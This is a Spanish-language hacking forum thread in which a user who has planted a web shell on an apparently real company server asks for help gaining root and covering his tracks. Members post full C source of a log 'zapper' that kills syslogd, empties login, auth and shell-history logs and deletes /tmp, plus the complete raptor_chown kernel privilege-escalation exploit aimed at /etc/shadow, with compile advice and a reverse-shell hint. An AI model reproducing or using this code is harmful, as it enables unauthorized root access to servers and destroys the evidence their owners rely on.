Rooteando =(

[user0]

wenas   
bueno como sabran no se mucho de hacking ni de defacing, pero el otro dia pude subir una shell asi q estoy re feliz! 

weno pero lo q pasa es q no se con q rootearlo si alguin me puede ayudar Sonrisa Sonrisa Sonrisa
Kernel:

  Linux server.gruposcreenmedia.com 2.6.9-5.0.3.EL #1 Sat Feb 19 18:26:49 CST 2005 i686 i686 i386 GNU/Linux
     Linux 2.6.9-5.0.3.EL
          linux-gnu
          uid=99(nobody) gid=99(nobody) groups=99(nobody)

a y de paso me podrian recomendar un zapper pls   


bye!!! 

[kazin]

Mira estos estan en perl y te da 777 permisos de ejecucion..

http://rapidshare.com/files/4166620/kazin.rar.html

ejecuta perl log.pl

[user0]

gracias Y FELIZ CUMPLEAÑOS!!

[kazin]

Jajjaja muchas gracias y no es nada para eso estamos

[porq69]

Para los q no lo saven Zapper es un script en el que borra todo o la mayoria de los logs de seguridad q guarda un Sistema Operativo.

Ejemplo de un Zapper::

Code Select Expand


/************************************************
*   agrezap.c                    *
*   ---------                    *
*                           *
*   Zapper coded by AgReSsOr of TBC LabZ    *
*   Credits: RootBox DST.            *
*                        *
*   Only for FriendS.                *
************************************************/

#include <stdio.h>

char *vd="\033[1;32m";
char *rj="\033[1;37m";
char *yl="\033[1;33m";
char *rd="\033[1;31m";

int 
main(int argc,char **argv)
{   
void
cartiotido()
{
    printf("\n         %sAgReZaP(zapper) c0d3d by AgReSsOr             \n",vd);
    printf("           ----(http://tbc-labz.org)----           \n");
    printf("\n");
}
void
greetz()
{
    printf("\n%sDedicate to :\n", rj);
    printf(" Status-x, RootBox, lwdz, KingMetal, ArCaX-ATH, Herzog,\n");
    printf(" everyone else at Forum's, #pc_labs and #tbc_labz\n\n");
}
void
engine()
{
    printf("\n[%s!] Starting Secuence of Cleaning ...\n",rd);
    printf("[%s+] General Cleaning ...\n",yl);
   
    printf("[-] stop some logs ...");
    system("unset HISTFILE");
    system("unset HISTSAVE");
    printf("                        %s[ OK %s] \n",vd,vd);

    printf("[-] killing syslog ...");
    system("killall -HUP syslogd");
    printf("                        %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /var/log/wtmp ...");
    system("cat /dev/null  >  /var/log/wtmp");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/run/utmp ...");
    system("cat /dev/null  >  /var/run/utmp");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/lastlog ...");
    system("cat /dev/null  >  /var/log/lastlog");
    printf("             %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.bash_history ...");
    system("cat /dev/null  >  /root/.bash_history");
    printf("          %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.sh_history ...");
    system("cat /dev/null  >  /root/.sh_history");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.history ...");
    system("cat /dev/null  >  /root/.history");
    printf("               %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.cshrc ...");
    system("cat /dev/null  >  /root/.cshrc");
    printf("                 %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.tcshrc ...");
    system("cat /dev/null  >  /root/.tcshrc");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/secure ...");
    system("cat /dev/null  >  /var/log/secure");
    printf("              %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/messages ...");
    system("cat /dev/null  >  /var/log/messages");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/xferlog ...");
    system("cat /dev/null  > /var/log/xferlog");
    printf("             %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning SHH log's ...\n",yl);

    printf("[-] cleaning /var/log/ssh.log ...");
    system("cat /dev/null  >  /var/log/ssh.log");
    printf("             %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /root/.Xauthority ...");
    system("cat /dev/null  >  /root/.Xauthority");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning apache log's ...\n",yl);
   
    printf("[-] cleaning /var/log/apache/error.log ...");
    system("cat /dev/null  >  /var/log/apache/error.log ");
    printf("    %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/apache/access.log ...");
    system("cat /dev/null  >  /var/log/apache/access.log");
    printf("   %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning sendmail log's ...\n",yl);

    printf("[-] cleaning /var/log/sendmail ...");
    system("cat /dev/null  > /var/log/sendmail.log");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/mail ...");
    system("cat /dev/null  >/var/log/mail.log");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning telnet log's ...\n",yl);

    printf("[-] cleaning /var/log/telnet.log ...");
    system("cat /dev/null  > /var/log/telnet.log");
    printf("          %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /var/log/telned ...");
    system("cat /dev/null  > /var/log/telnetd");
    printf("              %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning auth log's ...\n",yl);

    printf("[-] cleaning /var/log/auth.log ...");
    system("cat /dev/null  >  /var/log/auth.log ");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/auth ...");
    system("cat /dev/null  > /var/log/auth");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning /tmp ...",yl);
    system("rm -fr /tmp");
    system("mkdir /tmp");
    printf("                         %s[ OK %s] \n",vd,vd);
}
void
usage(char *s);
    char    c;
   if (argc <= 1)
   {
    cartiotido();
   }     
   if(argc>4||argc<2)
   printf(" Uso : %s [-start)] [-greetz]\n\n", argv[0]),exit(1);
       while((c = getopt(argc, argv, "s:g:"))!= EOF)
    {
                switch (c)
        {
             case 'g':
                greetz();               
                 return 1;
             break;
             case 's':
                engine();                           
            break;
            default:                 
                        return 1;
              }
        }
printf("[%s!] Finishing ...                             %s[ OK %s] \n\n",rd,vd,vd);
printf(" Oh You never was here...;)\n\n");
}

[user0]

buwno aca encontre el explit pero caundo lo compila me tira error
In function `int main(int, char**)':

• `getgid' undeclared (first use this function)
    (Each undeclared identifier is reported only once for each function it appears in.)
  `chown' undeclared (first use this function)

/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <[email protected]>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1)    Target /etc/shadow: on some distros (namely slackware 9.1 and debian
*   3.0, probably others) the shadow group has read access to it.
* 2)   Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3)   Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4)   Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r-----    1 root     users         500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/

#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

#define   INFO1   "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define   INFO2   "Copyright (c) 2004 Marco Ivaldi <[email protected]>"

int main(int argc, char **argv)
{
   char    cmd[256];

   /* print exploit information */
   fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

   /* read command line */
   if (argc != 2) {
      fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
      exit(1);
   }
               
   /* ninpou: sys_chown no jutsu! */
   if (chown(argv[1], -1, getgid()) < 0) {
      switch(errno) {
         case EPERM:
            fprintf(stderr, "Error: Not vulnerable!\n");
            break;
         default:
            perror("Error");
      }
           exit(1);
   }
   fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");

   /* print some output */
   sprintf(cmd, "/bin/ls -l %s", argv[1]);
   system(cmd);

   exit(0);
}

// milw0rm.com [2004-12-24]

[porq69]

Recuerda copilarlo en Linux y verificar q no aparesca copilado, muchas veces tiran errores al copilar pero funcionan bien lo q copilastes.

Recuerda leer las intrucciones...

Code Select Expand

* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1)    Target /etc/shadow: on some distros (namely slackware 9.1 and debian
*   3.0, probably others) the shadow group has read access to it.
* 2)   Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3)   Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4)   Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r-----    1 root     users         500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/

[user0]

a....
cheu ¹SlowEmotion² el explit q me pasaste esta en .sh y el active perl no me lo compila =(

[kazin]

Fijate de compilarlo bien como dijo porq69 ya que funiona correctamente... fue testeado por freak y funciono 10 puntos asi que es de confianza!

[freak]

a....
cheu ¹SlowEmotion² el explit q me pasaste esta en .sh y el active perl no me lo compila =(

men, el log.pl tenes ke ejecutarlo con el active perl .. pero no te olvides ke cuando te conectas.. tenes ke usar un exploit de conexion remota inversa para ke la shell se conecte a tu makina
por eso te dice el ke le des permisos de escritura y pongas perl log.pl